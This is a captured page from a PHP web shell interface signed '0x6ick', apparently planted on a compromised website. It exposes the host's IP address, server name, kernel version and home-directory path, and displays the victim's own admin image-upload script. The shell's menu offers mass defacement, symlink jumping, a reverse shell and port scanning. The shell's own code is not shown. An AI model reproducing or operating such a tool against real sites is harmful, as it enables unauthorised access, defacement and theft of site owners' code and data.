Tul xxx Tul
User / IP
:
216.73.216.159
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
daniel
/
assets
/
php
/
Viewing: upload_project.php
<?php session_start(); if (!isset($_SESSION['user_id'])) { header('Location: /0.14-Curriculum_Daniel/admin/login.php'); exit(); } require_once __DIR__ . '/db.php'; try { $pdo = db(); } catch (PDOException $e) { die('Error de conexión: ' . $e->getMessage()); } function isAjax() { return isset($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) === 'xmlhttprequest'; } if ($_SERVER['REQUEST_METHOD'] === 'POST') { $title = trim($_POST['title'] ?? ''); if ($title === '') { if (isAjax()) { http_response_code(400); header('Content-Type: application/json'); echo json_encode(['ok'=>false,'error'=>'El título es obligatorio']); exit(); } header('Location: /0.14-Curriculum_Daniel/admin/dashboard.php?error=El%20t%C3%ADtulo%20es%20obligatorio#projects-tab'); exit(); } $target_dir = '../../assets/img/proyectos/'; if (!is_dir($target_dir)) { mkdir($target_dir, 0777, true); } if (!isset($_FILES['project_image']) || $_FILES['project_image']['error'] !== UPLOAD_ERR_OK) { if (isAjax()) { http_response_code(400); header('Content-Type: application/json'); echo json_encode(['ok'=>false,'error'=>'No se recibió la imagen']); exit(); } header('Location: /0.14-Curriculum_Daniel/admin/dashboard.php?error=No%20se%20recibi%C3%B3%20la%20imagen#projects-tab'); exit(); } $basename = basename($_FILES['project_image']['name']); $ext = strtolower(pathinfo($basename, PATHINFO_EXTENSION)); if (!in_array($ext, ['jpg','jpeg','png','gif','webp'], true)) { if (isAjax()) { http_response_code(400); header('Content-Type: application/json'); echo json_encode(['ok'=>false,'error'=>'Formato no permitido']); exit(); } header('Location: /0.14-Curriculum_Daniel/admin/dashboard.php?error=Formato%20no%20permitido#projects-tab'); exit(); } // Evitar colisiones de nombres $safeName = pathinfo($basename, PATHINFO_FILENAME); $safeName = preg_replace('/[^a-zA-Z0-9_-]/', '_', $safeName); $finalName = $safeName . '_' . time() . '.' . $ext; $target_file = $target_dir . $finalName; if (!move_uploaded_file($_FILES['project_image']['tmp_name'], $target_file)) { if (isAjax()) { http_response_code(500); header('Content-Type: application/json'); echo json_encode(['ok'=>false,'error'=>'No se pudo subir la imagen']); exit(); } header('Location: /0.14-Curriculum_Daniel/admin/dashboard.php?error=No%20se%20pudo%20subir%20la%20imagen#projects-tab'); exit(); } $relative_path = 'assets/img/proyectos/' . $finalName; // Insertar con categoría por defecto 'web' (se ignoran categorías en la UI) $stmt = $pdo->prepare('INSERT INTO projects(title, category, image_path) VALUES (:t, :c, :p)'); $stmt->execute([':t'=>$title, ':c'=>'web', ':p'=>$relative_path]); if (isAjax()) { $id = (int)$pdo->lastInsertId(); header('Content-Type: application/json'); echo json_encode(['ok'=>true, 'id'=>$id, 'title'=>$title, 'image_path'=>$relative_path]); exit(); } header('Location: /0.14-Curriculum_Daniel/admin/dashboard.php?ok=1#projects-tab'); exit(); } echo 'Método no permitido';
Coded With 💗 by
0x6ick